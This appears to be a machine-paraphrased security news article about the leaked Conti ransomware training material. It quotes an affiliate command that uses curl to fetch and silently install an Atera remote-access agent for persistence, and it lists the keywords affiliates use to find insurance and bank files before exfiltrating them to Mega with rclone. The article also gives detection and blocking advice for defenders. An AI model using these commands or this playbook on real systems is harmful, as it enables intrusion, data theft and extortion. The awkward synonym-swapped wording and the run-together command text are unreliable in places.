The entire training material used by Conti ransomware affiliates was hijacked online this month, permitting an inside look at how threat actors harm appropriate software and seek out cyber insurance policies. In early this month, an annoyed affiliate posted to a hacking forum the IP addresses for Cobalt Strike C2 servers utilized by the group and a 113 MB archive containing training material for executing the ransomware attacks.

By utilizing that leaked training material, security investigators, network admin, and incident responders can better respond to the adversary and immediately find the common indicators of compromise (IOCs) utilized by the ransomware group.

This is exactly the case with the advanced research released by security researchers that shows how actual Conti attacks utilized the leaked data.

How is an Appropriate Remote Access Software Used as Backdoors?

The impressive tactic utilized by that ransomware gang is using the appropriate Atera remote access software as a backdoor for constant persistence. When executing an attack, the ransomware operations usually set up Cobalt Strike beacons that the threat actor can be utilized to run the commands remotely and achieve constant access to a network.

However, the security software products have become more accomplished at analyzing Cobalt Strike beacons, leading to a loss of access for the threat actors. To avoid this, security investigators state that the Conti group is installing the appropriate Atera remote access software on negotiated systems, which the security software won’t analyze.

Atera is a remote management service where you set up the agents to your endpoints so that you can handle them all from a single console. By set up agents to all negotiated devices on a network, the Conti threat actors will gain remote access to any device from a single platform.

Security investigator also states that they have seen the following command utilized by Conti affiliates to install Atera on a negotiated device:

shellcurl-osetup.msi”http://REDACTED.servicedesk.atera.com/GetAgent/Msi/?customerId=1&integratorLogin=REDACTED%40protonmail.com”&&msiexec/isetup.msi/qn [email protected] CompanyId=1

“In almost of the scenrios, the attacks leveraged protonmail.com and outlook.com email accounts to register with Atera to receive an agent installation script and console access.”

It is highly suggested that the admin utilize whitelisting tools to block or audit command-line tools such as ‘curl’ to discover malicious activities.

“Audit and/or block command-line interpreters by using whitelisting tools, like AppLocker or Software Restriction Policies with the focus on any suspicious “curl” command and unauthorized “.msi” installer scripts particularly those from C:\ProgramData and C:\Temp directory.” 

Conti New Target is Insurance, Banking files

One of the leaked documents titled ‘CobaltStrike MANUAL_V2.docx’ information the specific steps that an affiliate should utilize when conducting a Conti ransomware attack.

After the initial stage of the attack, which is to hijack the network, collecting passwords, and achieve control of the Windows domain, the threat actors tell their affiliates to start exfiltrating data from the negotiated network.

This stage is important for the threat actors, as files are not only utilized to panic victims into paying the ransom but hijacking accounting and insurance policy documents are also used to generate the initial ransom amount and execute negotiations.

When initial exfiltrating information from the victim’s servers, the Conti ransomware group will specifically look for documents related to the company’s financials and whether they have a cybersecurity policy. “search by keywords, need accounting reports, bank statements, for 20-21 years, all fresh, especially important, cyber insurance, security policy documents,” reads the translated Conti training document.

In particular, the threat actors look for the following keywords as part of their first data exfiltration steps:  

• cyber
• policy
• insurance
• endorsement
• supplementary
• underwriting
• terms
• bank
• 2020
• 2021
• Statement

The ransomware group tells the affiliates to “maintain the datapack right away” and urgently upload the entire information to Mega, which they utilize as a hosting platform for the exfiltrated data. Security investigators said that the attackers use the appropriate ‘rclone’ program to upload the data directly to the Mega cloud storage service.

“Rclone config is created and an external location (MEGA in this case) for data synchronization (data cloning) is established. The needed network shares are assigned within the rclone.conf on the victim’s network and a command is executed,” explains Kremez in a blog post.

Security investigators state that you should focus on any rclone.exe command execute from the C:\ProgramData and C:\Temp directories to detect data exfiltration attempts.